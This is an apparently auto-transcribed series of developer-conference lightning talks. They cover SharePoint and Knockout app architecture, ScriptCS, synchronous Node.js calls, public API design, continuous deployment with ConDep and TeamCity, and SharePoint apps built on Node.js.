We can select a topic, write something, and see what it is. A little sorting, and in it goes. And we have a step forward. This goes a bit fast, and we are talking to SharePoint through SharePoint's services, so everyone can follow, and we have a lot of lists and things on this site; that is what SharePoint comes with. And we started thinking that we needed a bit of architecture. I am an architecture kind of guy, I like things to have structure, and to have a single starting point. Because jQuery is like: document ready, do this, do that, and you have no clear picture of what happens first and what happens next. So... yes. So this is what we ended up with. In these letters you can probably recognize something MVVM-ish. At the bottom we have a service layer. And we have a T, which stands for the templates, or the tests, if you like. But we have it, and that is fantastic. I will say something about that. But first a small detour: we have been mocking around with this, and this is what a mocked-up application looks like, in a place where we can use some summer students, right? So I had been working on this, I had written a bit of the architecture and code, and we had something sort of up and running. It was not complete, but we had some pieces. And then it was time for summer students. Summer came, and we had students, four people coming in, and they had no SharePoint experience. How many of you know SharePoint? Right, quite a few. We had to find a way for them to develop the application without knowing SharePoint. That is an incentive. So what we proposed was an exchangeable CRUD service layer in JavaScript. Raise your hand, whoever knows what that is. Yes, two people.
Those are my colleagues; I have been working with them. So, an exchangeable CRUD service. It is something we can run against SharePoint, and it is a small abstraction. It looks a bit green here, but that is just the layout. And CRUD, you have the four operations, the four verbs that matter: create, read, update and delete. And we call it a service because it is our service bus towards the server. In our case we can have a CRUD service at the bottom, so we write one of these services for SharePoint. And we write one for Node. Hey! So we write one for Node. Once we have those four commands, which are sort of simple, we can also write a mock, so for testing and unit tests we can use a mock service that does not rely on the server. So we have those pieces, and we can put SharePoint aside for now and start building a layer on top of it. So this is an example of the SharePoint service. The most important thing for us here is that we have a mapping, because the items we get from SharePoint, from SPJS, are named what they need to be there, and in our app they are named something else, because we want to be able to build on a number of services with a different backend behind them. So we have a mapping, and we have to maintain one of them. It is a bit much for today, so I will not go through all the code. And we need to be able to get items, and this is the code we have for doing that, and it talks to SharePoint. There is no jQuery in this, and there is no jQuery needed if you have a different backend. We have a get items call; the important thing is to get a list of items. Our root in the meeting application is the meeting, so we know we will not get just any items. SharePoint gives you the context, so we know which meeting we are in, we know who we are and so on. We do not have to care about that; we just get all the items. You can just say which item type it is, and it gives you a query, and it comes back to you when it is ready. And the item types are, for example: I want all the tasks, or I want the agenda. And it comes back to you when it is ready. Then we have two functions that map to and from SharePoint. We use the mappings we have, just iterate over them and map things across, and we end up with an object. It is a generic object; we use inheritance, so we can inherit from the generic object and add to it. And this is where we start with Knockout. I assume that those who have been to the JavaScript sessions here at NDC have bumped into Knockout, if they had not seen it before. And the nice thing is that you write your values with Knockout observables, and they propagate to your UI. That is what we use here, because we can keep the state in the object, since it is observable, and that means we can have it in any layer. I will come back to that as well. So we have all these objects. And in SharePoint they live in lists; in a database you could have them somewhere else. I know that in Backbone there is a model, the naming differs a bit, but we have called it a model in our example, and the intent of the model is to keep a list of objects. And a list of objects also has a computed on it which says that if one object has changed, that means this model has changed. We have one place where we can see that one of the objects has changed. It can also be injected with a service, which says which backend we are wired up against. We can plug in the mock, or SharePoint, or Node, as a backend. One of the most important features of this model is that it has an update. And the main focus of update is to retrieve data from the server and blend it with what we have on the client. We have done it that way because we do not rely on anyone else telling us what we have.
That is because we are an enterprise: if we use a push server that gives us objects, that push server belongs to someone else. So when we use push services, all the push service tells us is that this list needs to update, and then we can just call update and get whatever is new. In this case we have a task model, and this is an instance, or actually not an instance, but an inherited form of that model, so we can keep the code in each single model to a minimum. This is also where we inject the service and call update, and we can say which task list this type of item is attached to, and what is needed for this type of item. So when we move on and pick out one part of the app to look at, we are back in the GUI, and we want to look at attendees. This is the attendees list in SharePoint, and this is what we made it look like. We are now up in the view-model part of the code. With Knockout this is maybe the part we are most familiar with. We say that all the view models get their dependencies passed in; we do not want cross-dependencies everywhere, which makes it very testable. All the dependencies are injected. We have also used computed observables, so we can separate the attendees who are attending from those who are not, and show them in a different way. We also have small functions, so we can say that we want to set this person to not attending, and it will actually save itself. And hey, it is very testable. We like testable code, and in our latest project we have used Buster.JS, made by two guys here in Norway, August Lilleaas and Christian Johansen, which we find excellent. Then we start looking at the views. We start looking at the HTML, and we see script templates. The template we have here is a template that renders a person. It is mostly HTML, and we see a data-bind attribute. Who has played with Knockout and knows the data-bind attribute? OK, most of you. Something people here at NDC have not talked so much about is the custom binding handlers you can write with Knockout. We have used them a lot. They let you bind in jQuery, which you know from before, or another module, the way you would do it with jQuery. So what you see here, the underscore/jQuery template, is a custom binding handler we have which says: I want this to be a jQuery template, and these are the items. So when we iterate over this and make a list and so on, it automatically wires up the template. You do not need document-ready or event handlers all over the place to do it with jQuery; it just happens. That is quite nice. And we can reuse that in this HTML. This HTML block is for showing all the agenda items that we saw before, on the board. And here we also use a template, the underscore one on the screen, which we just saw, and we can just iterate this template over everything we have in our view model. So we are almost, almost ready. And the first thing we have to do when we load the app is to create all the models, and this is how we fire up each of them. So we create one, push in the service, the user model in this case, and we call update, because we want to fetch data. We are ready for data now; we do not know if there is a view model yet, but we want to get data. And here we also have a live model that says: I want to listen, so that we can listen to a push server for the attendees, because we can show on the screen when something is updated, and the attendees can fire something up from Knockout with socket.io or some other push server, or we can listen to SignalR if we are in a strictly Microsoft environment.
And you can plug in whatever you have, and you have a live app. So we create the view models. We create the view models, and we apply the bindings to the div. That is what we end up with. Hey! Here we are! We fire it up. And notice that in the corner here we have a little green indicator saying that everything has been saved. Because when you are used to working with SharePoint 2010, you know that when you click a save button you wait ten seconds and get a full page reload, and when people here click a save button, they do not even know that it is a save button; they think it was something else. So it is very important to show them. Thanks for coming to my talk. That was my talk on Enterprise Hipster apps with SharePoint and JavaScript. I hope you enjoyed it. Thank you for coming.
|
I'll tell the story of the little enterprise app that wanted to be hip. It fled the scary realm of the SharePoint server and moved its code to the browser. The app could talk to SharePoint when it wanted, on its own terms. Finally, it felt it could breathe again and its web devs could throw all their magic spells without fear of retaliation. The application architecture is MVVM. It is built with 9 models and 7 view-models, which means it is large enough to be interesting, while being small enough for demonstrating inner-workings and details. I will discusspros and cons of the architecture, lessons-learned on performance, testing and benefits of using SharePoint as a platform for enterprise apps.
|
10.5446/51456 (DOI)
|
All right. Thanks for coming. My name is Justin Rusbatch. I am the author of Compilify.net, an online IDE for C#. It lets you actually evaluate code from your browser. And together with Glenn Block and Filip Wojcieszyn, I am a coordinator for the ScriptCS project. So if you're like me, you have a folder somewhere on your computer that looks a bit like that, either from console apps that you spun up to explore an idea or a console app that you wrote to schedule as a recurring task or something, for whatever reason, you ended up with a folder that looks like this. Up until now, there really hasn't been a good way to do any of those things without creating a brand new solution in Visual Studio. The problem with creating a new solution in Visual Studio is that you're creating 15 new files every time you go to a new solution, 15 new files in seven different directories on your hard drive. And you're waiting who knows how long for Visual Studio to just open and create the solution for you. So that's one of the reasons that Glenn Block came up with an idea called ScriptCS. And what ScriptCS is, is a lightweight scripting experience for C#. It's based on the Roslyn compiler and inspired by Node, so that you can write simplified C# in just a simple text file with any editor, your favorite editor even. What we do is wrap this Roslyn compiler and provide a hostable scripting environment that you can execute from your command line or include in your own application to run C# script. The C# script is a little bit different than regular C#. Roslyn goes through a lot of processes to make sure that you don't need to write as much code as you would typically write in a regular C# application. For instance, namespaces and classes, top level classes, are just optional. You can write them if you want to, but you could also write a top level function, regular C# statements just in the global scope. We also go a step further and provide some NuGet integration that allows you to reference NuGet packages from your script, install NuGet packages for your script to use, and restore NuGet packages from a packages.config file that NuGet would create for any other solution that you have package restore enabled for. Like I said, this was inspired by Node, so we kind of see a parallel between ScriptCS being Node and NuGet being kind of the NPM. Glenn really wanted to create a very parallel experience. He got tired of the Visual Studio molasses that you have to wade through when you just want to do simple things. This is going to be a typical example of a script. Like I said, the scripting syntax is a little bit more relaxed than what you would be used to in a regular Visual Studio C# file. Scripts use a CSX extension for one. And you can see I only have four files in this directory, three of which are code, one of which is the packages.config, which lists my dependencies. Instead of the 15 files that I said Visual Studio would create for you, so that right there is a lot less of a headache. There are a few other things that Roslyn adds to C# that help you get started. And one of them is a load extension, which allows you to reference additional C# scripts and divide your script or application or whatever into multiple files. Another, which is not shown here, is a preprocessor directive, just the letter R, written #r. And that allows you to reference assemblies or DLLs that you've already built in Visual Studio.
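As an illustration of the relaxed syntax described above, a ScriptCS file might look something like this. The file names and the SayHello helper are made up for the example; only #load, #r and the ability to write statements at the top level are the point.

```csharp
// hello.csx - run with: scriptcs hello.csx
// No namespace, no class, no Main; statements simply live in the global scope.

#load "helpers.csx"            // pull in another C# script (assumed to define SayHello)
#r "MyExistingLibrary.dll"     // reference an assembly built earlier in Visual Studio

using System;

Console.WriteLine("Hello from a plain text file at " + DateTime.Now);
SayHello();
```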
So using this scripting experience, you're able to actually reference things that you might already have laying around. So it really helps with that. As you can see, there are no top level namespaces, no need for classes or anything. What this is doing is actually spinning up a new web API host to listen on port 8080. I'm not sure how many of you are familiar with web API, but it's a simple, self-hosted server that doesn't require IIS. And it just listens on the port that you specify. And it's setting up the default route. It actually goes through a few additional steps that we need to jump through to host web API from a script. We need to write a custom script controller resolver, because web API doesn't pick up controllers and dynamic assemblies. But other than that, it's very standard web API code. We also offer an extensibility point, actually, called script packs. And what they are are new, get distributed assemblies that allow you to kind of set up your environment for your scripts. The goal of ScriptCS is to illuminate as much boilerplate code as possible. To reduce the number of lines you need to write to have a working application as few as possible. Unfortunately, not all the lines that are boilerplate are related directly to C-sharp. We eliminate as much of those as we could with the relaxed scripted syntax. But there's also things related to individual frameworks that are framework specific that you need to wade through. Web API was a great example, because you needed to set up the default routes, which almost never changed. You needed to specify the URL and include additional using statements. So what we did was we created this concept of script packs that allow you to reference additional assemblies for you and add additional using statements and expose functionality in a way that's very similar to the require statement in Node. We expose a global function called require when you call require type of script pack. And it'll add all of these things that you would otherwise need to write. So again, this is the same script that I just showed you. Not using a script pack. But what we did was we set up an example script pack for Web API. And it reduced all the code that we needed to write to that. We took the using statements out. The script pack takes care of that for us. We dropped a bunch of the boilerplate. We don't need to set up the custom controller resolve or any more. The script pack takes care of that for us and registers it with the configuration. And all we need to do is pass in a string to a method called create server. Now you'll see the require method being used there. And the script pack author, what they can do is they decide what's returned by that method. And then any function that they choose to expose on the object that they return, we expose to you. So if they wanted to simplify how you create a server, you can't get much simpler than that for Web API. But if there were some steps that you would need to go through with another framework, you could reduce it to a few helper methods on this object that's returned. So it saves a ton of time. And we're still looking for ways to reduce the number of lines of code that you need to write. But for Web API, it doesn't get much simpler than this. We have already got several script packs being written by several authors of many popular frameworks, including Nancy. We have a WPF script pack, which is very impressive. It allows you to run XAML straight from a regular script. 
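Put together, the script-pack version of the Web API example described above ends up looking roughly like this. Require<WebApi>() comes from the Web API script pack; the member names here are recalled from the sample and should be treated as approximate rather than authoritative.

```csharp
// server.csx - a self-hosted Web API in a single script file.
using System;
using System.Web.Http;

// A plain Web API controller; the default route convention maps it to /api/test.
public class TestController : ApiController
{
    public string Get()
    {
        return "Hello from a script-hosted Web API";
    }
}

var webApi = Require<WebApi>();                            // provided by the script pack
var server = webApi.CreateServer("http://localhost:8080"); // sets up routes and controller discovery
server.OpenAsync().Wait();

Console.WriteLine("Listening on http://localhost:8080/api/test - press Enter to stop");
Console.ReadLine();
server.CloseAsync().Wait();
```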
Service Stack, Azure Media Services, and Azure Mobile Services all have script packs. So how do you get ScriptCS? What are the steps involved? We install and distribute ScriptCS through Chocolatey. I'm not sure how many of you have heard of Chocolatey, but it is similar to apt-get for Windows. It installs applications through NuGet for your system to use, adds them to your path, and everything. So all you need to do is install Chocolatey and run the command cinst scriptcs. And we'll pull down the latest version for you from NuGet and throw it in your path. It's actually installed to your app data directory, so it's per user. And it's instantly available for you. Updating is just as simple. You simply run cup scriptcs, and you get the latest version automatically. Glenn had a really genius idea. ScriptCS is open source, and we have gotten a ton of community activity since we started. So if you visit us on GitHub, there are a bunch of issues out there. If you have any suggestions, any issues when you're playing with it, we'd love to hear them as soon as possible. And it would definitely help us out. So thank you very much. My name's Justin Rusbatch. Now go get scripting. Thank you. So I'm going to speak about just hacking Node.js ugly, nastily, like, you know, ingloriously, to make it run synchronously without doing any fibers or coroutines or anything like that. Who am I? I work for 10gen, the MongoDB company. I live in Barcelona, although I'm born here, so I'm Norwegian as well. So why do we want to make Node.js actually behave in a very unglorified, synchronous way? It all started because we have a Mongo shell that comes with the database that's actually JavaScript, right? And that's actually, it used to be SpiderMonkey from Mozilla together with a bunch of C++ code. And we changed to V8, like in the last couple of releases, and we started thinking about, like, is it feasible to actually just use Node.js? Because one thing you can do with Node.js is actually you can package up your own custom Node.js distribution as a single binary. But to do that, we kind of had to get around a couple of problems. And the banana code is one of them. The typical Node.js code will look something like this. I mean, as you're writing callbacks, and callbacks, and internal callbacks, you tend to end up in a big, nice banana. And dealing with this isn't really feasible for us, because our shell was synchronous from day one. So you could do something like db.test.insert, where test is a collection, and do something like that. So I couldn't really do that easily in Node.js. And we needed to be backwards compatible. I can't release like a shell that just doesn't work like this anymore. And to get around that issue, there's a couple of possibilities out there. There's something called node-fibers, which are coroutines. It's actually using threads in the background. It doesn't compile on Windows. It barely works. But it's out there. But it's a hack. It's not actually supported well in the runtime itself. But it's based on the same thing that you know from C# about futures. So you wrap something in a context. And then as long as you're in there, you have the typical wait kind of statements that lets you kind of fire off an asynchronous call and kind of put that coroutine into a sleep mode while something else happens in the event loop and then get back when there's actually some results back. So we wanted something very much simpler, and to avoid wrapping something in a fiber.
So another possibility is something that's coming in ECMAScript 6. It's called Generators. And it introduces a concept of the yield keyword and generator functions. And this is kind of a language level feature. Most people who are discovering JavaScript now don't really realize that in probably about a year, there's going to be a massive shift in the way the language works. It's in Node.js under the secret harmony switch, which I can't even spell switch. But if you, for example, download Node.js 11.2 or higher and do slash-sharmony, you suddenly have access to all of these new features that are coming in older browsers sometime in the future. So they will all be in Node.js long before anything else. To play around with it, you run the harmony thing and then you do an npm install, which is the Node package manager of nice little library called Galaxy that will help you basically do it more simply. And code like with basically looks like that. You see this new kind of function declaration with a little star on it. That's a generator. You have a little keyword yield, which basically yields to the system. And then what you're getting is back is actually some sort of iterator. So as long as you're actually doing next, it will process the next kind of statement. And then it returns an object that returns the actual value and if it's done or if it's still executing. So you kind of keep stepping through the function until you actually are done. So it's not quite core routines like you have in C-sharp, but it's close enough. So I decided this wasn't going to work either. So I decided let's do something nasty instead. And let's make blocking calls. And let's make this only feasible for scripting and make it simple. So that means C++. And I'm going to go real quickly through this. But this is what a C++ code for an extension in node looks like. So actually it's a quite nice C++ because the Google guys really did a really good job on the way the whole library works for V8. But to be fairly simple, what we're doing is that we're creating a new function that wraps the function that we're going to call. And then what we're doing is that we're running what we call the event loop in Node.js a step at a time. So think about in your debugger and you run your code one step at a time. We're doing the same thing, but with the actual event loop. So we keep running that until there's actually a result back. And since we are wrapping the function that we want to call with our own function, we can evaluate that function and check if a variable has been set so there's a result back. Once that's done, we return results to the originating caller. So we're not calling back, we're actually just doing a normal return. Everything else that is behind that blocks basically. So what's the usage of this? It's fairly simple. You do a sync, require sync it. And then you take a function in Node.js, like the read directory function. And you do a sync, wrap FS, read there. It gives you back a function. And now you can do like wire.final.ms equals read there and then dot result. If it errors out, you get a dot error as well. So you can check out the actual error that comes back. And that lets you basically just script it simply and do console.log whatever like that. And it still works with another async calls. So if you interleave this with other calls that are doing things against other IO operations, like other IO operations. In this case, we're doing a setTimeout. 
And then we're basically going down here and we're doing the actual sync operation. You can see from the execution time that we're doing starting a sync block on Timeout, which is like right here. Here we're blocking, waiting for a second. And then we see there a synchronous call actually executes, the one we started up here in between. Because we're single stepping in this event loop, we're still letting other stuff run. And then we finish up and we exit. So what's the problems? UV run is a no-no in any extension. You should never call this. Things that don't work like HTTP parser, for example, is not thread safe. So if you try to do this in a web application and then put some load on it more than a single thread, you're going to like sync fault. So what's the simple? Use it for a script, don't ever use it for a web app. And to install it, just do npm install dash g sync it. And check out my document db talk tomorrow in roommate at 1.40. That's it. Are we college break away? Yeah. Shall I start? Yeah. Hi, everybody. I will be talking about the mindset to develop public API. I will not be showing any code, so it will not be that geeky talk as to previous talks. So I will introduce myself. My name is Kajtse Mostafina, and I'm a developer. I've developed software for 17 years in different companies and countries and roles. And the last six years I worked for Norway Technology Center, SNTC, where we develop software solutions for oil industry. And we develop here in Norway our flagship product called Petrel. And Petrel is a product for helping people find oil. And that is considered to be one of the largest software applications in the world, software packages in the world, and consists of thousands, because there's millions of lines of code, and developed by hundreds of developers. So we have customers all over the planet in Europe, South America, North America, and Asia, and all the continents. So we started developing Petrel here in Norway as an application. And a few years ago we have created an open API for that and made it extensible. And we called it an API Ocean. And that actually today hundreds of developers develop plug-in and extensions to Petrel and use it as a platform to develop their own applications and their own needs for that. And I've been working in Petrel as an application developer for some years. And today I'm working as an Ocean API developer. So I joined the group that has been developing API last year. And what is the difference when you develop an API and then you develop an application? I'll talk in the next few minutes. So API is no different. It is also code. And so all the principles on designing a good code also apply to API. The key difference here that is the API we develop for other developers. So there will be other people and other developers who will use it in their programs to make their own, solve their own needs and write their own programs. And so what are the principles to keep in mind when we develop an API? I will talk in the next few minutes. And the first rule is to keep it simple. And when we design an API, we should think about a simplest user that will use that API to get him started. Is it easy for him to get started? Is it easy for him to just write his first Hello World program? Is it easy for him just to do these needs without going into documentation, without a big learning curve? 
And if you have some advanced specific user, an expert who wants to write something specific, we should actually think carefully if that scenario fits to this scenario for the simple user. And if it doesn't just go for a special API for that user, because they're already in, they already know what they're talking about, and they don't need, they can invest some time in learning on how easy it is to do. So keeping it simple for simple user is essential in developing API. And we might not think about it when we are developing an application. We think about it to some degree, but an API is really important. What classes you use, how you name them, how you actually use them in applications. And the second issue is the stability promise. So it is a period that people handle much easier their changes in their interfaces, so functionalities than changing the API. For example, if you download an app from the iPhone app store, and I don't know the Spotify recently, and it has totally different interface, but if it is intuitive and if it is easy to understand, people handle it quite easily. If it is a little bit learning, that's fine for people generally, but it's so much different if they have to go and change their code. They have to do some work. Whatever you change in API, you have to actually, you force people to change their code. They might not have resources to do it. They might, they don't want to do it. And the stability promise is much bigger in API development. And we in Ocean have two years stability promise. So we actually declare that we may change things in two years after. That works in paper more or less, but in reality, people are still very much unhappy when they have to change things. So we very often never change it ever. So stability promise is a big deal in API development. Consistency. The frameworks we develop must be consistent. If it is, if one knows part of the framework and the part is used for that, it must, the one must be actually easy to understand the code and easy to guess what this code is doing by knowing the rest of the framework. And this is very important that people can resemble, can understand the code by analogy on that. Doing that, if there is some cool part and if there is some new technology to use, that we would like to use. But it's not consistent with the rest of the framework. We probably have to drop it. And this is unfortunate, but that is, consistency is a big deal when it comes in API development. And the last, but maybe the most important thing is just to use it. Just to make sure you can use it internally before you ship it to others. Because here is stability promise is not there yet. You can't change it still. And find the group that would be using it internally before you ship it. Maybe find someone, if you can't find it just making a workshop or maybe write a set of unit tests that would be used, the documentation to the API is important thing to do it. Because here we can change it. I know working in a project that consumers we have is, they sit next door to us. So we actually ship them new versions every day. So we can change things quickly and we can change things easily before actually stability promise came to change, came to station. We can actually ship it and then we can change it probably never. So we developed that framework based on those principles. 
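As a made-up illustration of the "keep the simple scenario simple" principle (this is not Ocean API code, and all names here are hypothetical): give the beginner one obvious call with sensible defaults, and put the expert options somewhere they can be found by those who need them.

```csharp
// Hypothetical example only: the simple user calls Load(path) and is done;
// the expert user discovers the overload with options by analogy.
public static class WellReader
{
    public static Well Load(string path)
    {
        return Load(path, WellLoadOptions.Default);
    }

    public static Well Load(string path, WellLoadOptions options)
    {
        // Actual loading omitted; the shape of the API is the point.
        return new Well();
    }
}

public sealed class WellLoadOptions
{
    public static readonly WellLoadOptions Default = new WellLoadOptions();

    public bool ValidateUnits { get; set; }
    public int MaxSamples { get; set; }
}

public sealed class Well { }
```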
And now we have like hundreds of plugins that people download and use, and people write the plugins because they, for example, have some confidential, intellectual property that they don't want to disclose to us. But they want to use our program as a platform. And today we don't even have a special team that actually develops an API. We actually gave it to all the teams who develop the functionality. They have to develop their own API and keep these things in mind. Thank you very much. We appreciate everyone in the audience for taking the time. Could I get some tech help? I need mirroring displays. Come on, let's go. Doesn't react. I need mirroring. Can I get some mirroring? I'll try. All right, my name is Jon Arild Tørresdal. I'll show you how to do continuous deployment in about 10 minutes. Here I say, I'm going to use two things. I'm going to use an open source project called ConDep and then TeamCity. This is how I recommend you do continuous deployment on Windows. So here I have a simple web application that you've probably all seen before. I'll just try to run it so you can see what I mean. I need to drag in that browser so you can see it. So this should be familiar to most people on .NET. Where's my arrow? Hello, there it is. All right, and I'm going to deploy this to a server in the cloud, which we also have on a different screen. Let me see. Sorry about this. Here's a server out at Amazon, which now has a default website with no content and has a folder somewhere which doesn't have any content. So I'm just going to create a new project, a new project. Class library, just going to call that deployment. Just renamed that class. We have some name for it. NDC web app. And in order to do ConDep stuff, you need to have a library, namely ConDep. And here I'm just going to use the beta version. And you get, so I have include pre-release here. Hopefully I'm on wireless. There it is. Just install that. Pulls all the dependencies down. And we now have a domain specific language for doing deployment in C#. So what I'm going to do with this class is that I'm going to inherit from an abstract class called application artifact. And I'm going to implement a method called Configure that takes two objects. I'm going to use the first one, that's on local machine, that gives me access to this DSL. So I'm going to do a deployment to a server now. So I'm going to say to each server, which takes an action. You can use that action. And I get either deploy or execute. I'm going to deploy. And I'm going to deploy an IIS web application. To just make this a bit quicker, I'm just going to copy some code. And I'm just going to explain what that is. So here I have a source directory that tells me where is the source for the application that we're going to deploy. Sorry? Yep. No worries. Is that enough? And the destination directory where the application is going to end up on a server. The web application name, which is the name in IIS for the application. And the website which it should belong to. So that's the only two things I need. That's the only thing I need to define in order to deploy an IIS application. But I only tell or define through the DSL what I'm going to do, not where I'm going to do it. So I need to add a configuration file. So I'm just going to add an existing one to make it a bit quicker. And this has the extension dev.env.json.
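For orientation, the deployment class being built in the demo has roughly this shape: inherit from ApplicationArtifact, implement Configure, and use the DSL to deploy an IIS web application, while the dev.env.json file supplies the servers and credentials. The exact ConDep type names and method signatures vary between versions, so treat this as a sketch of the idea rather than copy-paste code.

```csharp
// Sketch of the ConDep deployment definition described in the demo.
// Parameter names and the IisWebApplication signature are approximations.
public class NdcWebApp : ApplicationArtifact
{
    public override void Configure(IOfferLocalOperations onLocalMachine, ConDepSettings settings)
    {
        onLocalMachine.ToEachServer(server => server.Deploy.IisWebApplication(
            @"C:\build\NdcWebApp",        // source directory (the build output)
            @"C:\websites\NdcWebApp",     // destination directory on the target server
            "NdcWebApp",                  // web application name in IIS
            "Default Web Site"));         // the website it belongs to
    }
}
```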
So this is a configuration file for the dev environment. If I want to have something for a test environment as well, it would typically be test.env.json. I'm just going to make sure that this is being copied when I build. So just do like that. And here I tell ConDep which servers I'm going to deploy to. There's just one server, but it can be as many as you want. And which user you are going to use to authenticate with towards that server. We have a password in clear text, but that's going to be fixed. We need to encrypt that. But right now it's in clear text. So I'm just going to build this to see that it works. And then bring up my browser again. Not that one. So here's TeamCity. I've defined a project to build the web application as standard. The only difference between this one and the regular one would be that I've defined... I don't know if you can see this, but I've defined where the content of the build output for that project ends up, in a build zip, which is the artifact for the build. I'm just going to make this a bit bigger. No? Okay. And then we need a separate project in TeamCity for actually doing the deployment. Just to make it easy, I'm just going to do this. I have a project here. I'm just going to walk quickly through the settings for this project. Actually, before that, I'll need to show you just a folder. So when I did build earlier... Fantastic. That ended up in the deployment project in a bin folder. You see that I have the DLL for my deployment project, but also a ConDep.exe, which was pulled in when I added the NuGet packages. This is the one we're going to use in order to actually execute the deployment. So just give the project a name. There's no version control settings because it just depends on the previous build. Define a command line, which is just the name of ConDep.exe, the exe file that does the deployment. And you tell it which DLL it finds the deployment definition in. And then you point to the environment that you're going to use. And then it just uses convention to figure out, well, dev.env.json is the JSON file I'm going to use to find the environment settings. And then the name of the class that we defined as the definition, which is the one we saw here, right? So that's it. So what we can do then is... So I basically now set up... Well, actually, there's one more thing. That's how you define the deployment. And then you want to have a continuous deployment. So add a trigger to say that, well, whenever the previous build project is successful, this one is going to kick off. And then you set up a few dependencies. Say I have a snapshot dependency on the previous project and an artifact dependency on the build zip file. And I just unzip that into a folder so I can use those files during execution. And that means that we now can go into Visual Studio and make a change to this project. Let's say we're going to do... Change the name here and just say something like that. Just to make a change. And I'm going to check that in to GitHub. Oops. Like that. Pushed this to GitHub. I mean, you can use whatever source control system you want connected to your CI. And if we go out here, CI should kick off this process. So I'm just going to help them a bit. So trigger it. And as soon as that's finished, it's going to automatically trigger the next one, which is the deployment. By the way, if you want to know more about ConDep, I have a talk on this tomorrow at 13:40. So drop by if you want to know more. And then suddenly this one's going to kick off.
Usually takes a bit of time. Come on, you can do it. There it is. That kicks off. Look at the build log, what's going on. Executes ConDep. ConDep starts doing stuff on that remote server in the cloud. I can't really say much about the details here now. I'll talk more about that tomorrow. If we go to the server and have a look at this folder, a folder should show up here very soon called Web Apps that contains the application that is going to be deployed. So it's just about to do the deployment now. So in 10 seconds. So that's Web Apps. And it's also a Web App. And if you look at the website, the website's there. And if we go to this one, do refresh. It's getting displayed. So that's how you do continuous deployment. Hello, everyone. This is my first public appearance as a clown. By the looks I'm getting when I'm wandering, walking around the halls, it might be my last. We'll see. So I'm Bjørn Einar Bjartnes, developer at Computas. But today I'm here as the enterprise clown, my alter ego. And I just have to give a little bit of warning. There might be some rants in here. We'll see. So at some point, Bjørn, he took the red pill and he saw what was outside the enterprise world. And he saw what the cool kids were doing on GitHub. And he saw how lean software they built. He saw that with his own eyes. And he learned that the true battle is not the battle between Eclipse and Visual Studio. It's between Vim and Emacs. He learned about the history of our industry, of which little is spoken in the enterprise. And his eyes seeing clearer every day, the way of the enterprise makes Bjørn really sad. And to stay sane, he sometimes lets his inner enterprise clown out, as today. And the clown does stuff that does not really belong in the enterprise, but cunningly disguised as a clown, he gets away with it. And sometimes he even manages to put a smile on the depressed Bjørn's face. And the clown helps Bjørn stay sane while he dreams of better days for our industry. So the blue pill represents enterprise software of today, whereas the red pill represents what's out there, what's out there on the Internet. So I figured, let's eat the red and the blue pill and go on this purple trip. It might expand our consciousness. Let's build SharePoint apps in Node.js. So, not to be too abstract, I'm just going to show you what we did at a hackathon, me and some friends. I'll have their names later. It was the Arctic SharePoint Challenge earlier this year. And so what we're seeing here is this multi-user real-time application on SharePoint. So you see we're using Leap Motion to drag and drop these tasks. You can control priority and completion date and you can add new tasks. And you see how they're synchronized with the iPhone and the iPad using WebSockets across the Atlantic in real time. It's not your typical SharePoint application, right? So Node.js has been mentioned before. The key thing I want you to think of here is to drop that "JavaScript runtime" label: it's a platform that's built to do scalable network applications. I'll come back to that. You're talking about SharePoint apps, right? Why are you suddenly talking about distributed network applications? We'll come back to that. That's really all we need to know. And the other part is about leanness.
And the Hipstru factory is also pretty good on Node.js. It's starting to fade off. I think it's close to Erlang and close to Closure, almost there. So that's a plus as well. Whereas this guy, SharePoint, has a Hipstru factory like Near Zero, maybe negative. And it's this big enterprise monolithic product. And we're doing this IDE driven development by Wizards. So we have this Wizards that leads us through and pretends to help us. And the cool thing about SharePoint though is that in 2013, Microsoft opened it up. They created their API. They call it a REST API. It's pretty REST, part of it is RESTful anyway, which allows you to connect with whatever web technology you like. So since I don't know Erlang, I've tried to do something with Node.js on it. So we all know this guy, right? He's a powerful wizard. He's a very good wizard. He helps you do stuff. He helps good people do good stuff. Then we have this wizard. He's an evil wizard. He blurs your vision. So you hardly can see what's going on. And I'm thinking, I'm trying as hard as I can, and I guess a lot of you are as well, to be good programmers. And then we get this Joe Sixpack IDE that Microsoft thinks is going to help us to build better stuff. This is their idea of DevOps, right? That you're supposed to choose your dev environment by a drop-down list, and press F5 and everything is going to be okay. Either they've solved DevOps with a drop-down, or it's the major leak abstraction that is going to ruin your project when you're going live. You might work for one guy and one machine doing dev stuff. If you're lucky, it's going to work in one instance when you deploy it. I'm not going to go into detail on this part. This just shows what you have to start to do manually when you're building a SharePoint app. You have the client. You have your SharePoint application here. You have SharePoint itself. And you have the Azure ACS, which gives you does all authorization and authentication and all of that stuff. So there's a lot of tokens flying around here that you need to understand in order to build this if you're doing it from scratch. All of this stuff, the wizard wants to hide from you, but sooner or later, you need to understand this anyway. So this is the architecture of a SharePoint, typical SharePoint application. So you have this is your SharePoint instance in the cloud. So these are all your clients that are connecting to SharePoint. Then you have ACS, that does the authorization part. Then you have your application. In my case, it was Node.js running on Node.jitsu just to really show it's decoupled. I'm building on Linux. I'm deploying on Linux and running on Node.jitsu. So it could have been Azure, but I'm trying to stay all enterprise clowny. You need to do it on non-Microsoft technology. And you might be using some Azure backend services as well. And this is where these distributed network applications come into play. Because in a real-time app, you have secure web sockets. You have HTTPS to multiple clients. Clients can talk directly to SharePoint, and SharePoint will talk. So everybody's talking to everyone here. And this is where this Node.js event loop model fits really well in. Not if you do it synchronously as shown before, but if you let Node do its job normally. So again, just a screenshot from how you can deploy stuff when you're running and building on a proper operating system. You have a proper shell that can deploy. You see the package, and you can run commands to deploy it wherever you want. 
And you have full control of what's going on, which is very, very nice if you're building applications that are supposed to work. So I'm going to a little bit more just to show you an example of how this looks like. So you see now we're on ByardWolf SharePoint.com. So this is a SharePoint instance in the cloud. And I can launch my application. So I'll launch my application, and all this authorization dance is going on. And we're on Node.jitsu. And we have cute cats on tasks. And you see, this looks very much like SharePoint. You can pull in all the Chrome. Everything is web-buried. I mean, you can do this. You would think this is a typical SharePoint application, but it's running on Node. So you can create new tasks. And when you create something, it's sent to SharePoint. And when you just drag stuff around for the real-time stuff, SharePoint doesn't even know about it. Your application is just relaying this to all authenticated clients. So we can go back to SharePoint to see our task is back here, and we can add that to the task list. So what do we get? We get this lightweight application, which is cheap to host. It's cheap to scale. It's possible to understand, which is very good. And you can leverage all these cool NPM modules. I want to give a few shout-outs to MacRotter at Qport. He made this passport strategy for Node. I stole everything from him. I'll scale your NARA, and I'd love if you're helping me build this thing in the Hackathon. Here's the code if you're interested. This code is Hackathon code. I wouldn't use it for anything serious. And if you're into building cool apps on SharePoint, but more for real, not as 